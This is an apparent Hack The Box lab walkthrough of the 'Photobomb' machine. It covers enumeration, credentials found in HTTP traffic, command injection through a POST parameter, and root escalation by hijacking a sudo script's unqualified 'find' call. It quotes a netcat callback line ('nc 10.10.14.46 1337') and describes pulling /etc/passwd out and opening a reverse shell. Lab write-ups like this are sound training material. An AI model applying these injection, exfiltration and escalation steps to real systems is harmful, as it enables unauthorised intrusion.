HTB Walkthrough: Photobomb
Upon enumerating with nmap we discover that ports 22 and 80 are open.
When we navigate to the IP address via the browser, we are presented with an inability to reach it but we see the domain in the search bar. After updating /etc/hosts, we are able to see the web page.
The webpage prompts us with a link that then asks for credentials. In an effort to find other areas of the website, I enumerate with gobuster and come across the following:
We see there are a couple of directories we can navigate to. A chunk of them require authorization, meaning we need credentials to access them, but there are others that come up as a bad request. It may be worth navigating to them in a browser just to see if there are any hints there.
We see something about Sinatra and some code. A bit of research points to this:
This may be useful once we gain initial access to the target, but for right now research shows there are no initial access exploits we can leverage to ingress.
Aside from what we found, there don't seem to be any glaring hints on the original web page or in any other areas related to the target. At this point, I decide to spin up burpsuite and open the webpage within the burp browser. After replicating the same steps I did previously in firefox, I start to inspect the traffic and come across my first bread crumb:
In the response, we see credentials. If we pass these to the credential prompt, we gain access to a new web page.
From here, we can select a photo, its dimensions, its filetype, and download it. I attempted this with several of the photos and got nothing of use within the downloaded files. I pivoted back to burpsuite to see if there was anything useful within the download requests:
We can see that several parameters are being passed in the POST request when the user wants to download an image. I will save you the plethora of time I spent playing with parameters to enlighten you on what comes next.
From here, we can leverage what is known as a command injection. Simply put, you pass commands to the target host by injecting them into one of the parameters in the POST request. This requires a lot of trial and error and is a job for Burp's Repeater function.
Useful websites for payloads and guidance can be found here:
After testing way too many payloads, finally I got somewhere. I tried the following:
I noticed that the response to the request took some time before it came through, whereas with my other attempts I was getting almost immediate responses. This led me to believe that I was onto something, and I was right. I tried changing the payload from 'ping -c 20 127.0.0.1' to a bunch of other reconnaissance commands but was getting no feedback within the HTTP responses. I then finally had a brain moment and set up a netcat listener to test whether or not the payloads were indeed executing on the target.
I then passed 'nc 10.10.14.46 1337' in the POST request parameter and crossed my fingers:
So I tweaked my payload a little and tried to pull down /etc/passwd:
Changed my listener and saved the file locally, and successfully pulled it down:
We see we have a user "wizard", so let's try enumerating their home directory:
We see the user flag is in /home/wizard, so with similar steps we can get its contents.
Stabilizing the Shell
I found a resource online that assists in making reverse shells, and to be frank the POST request for individual commands was getting old so I started trying to figure out how to get a better connection. The following link is a great reverse shell generator:
I used the following payload to create a more stable shell:
Something I always do after gaining access to a box is seeing what sudo privileges I have as the current user:
We see that I have the sudo privilege to run /op/cleanup.sh as sudo, and we also have the privilege to set variables. Let's take a look at the contents of /opt/cleanup.sh to see what we're working with:
We see that at the bottom of the script, find is used without its absolute path. We have a vector for privilege escalation. We can create an executable file named find that points to a bash shell, and since the script executes with sudo privileges, the resulting shell that spawns will also be in the context of root.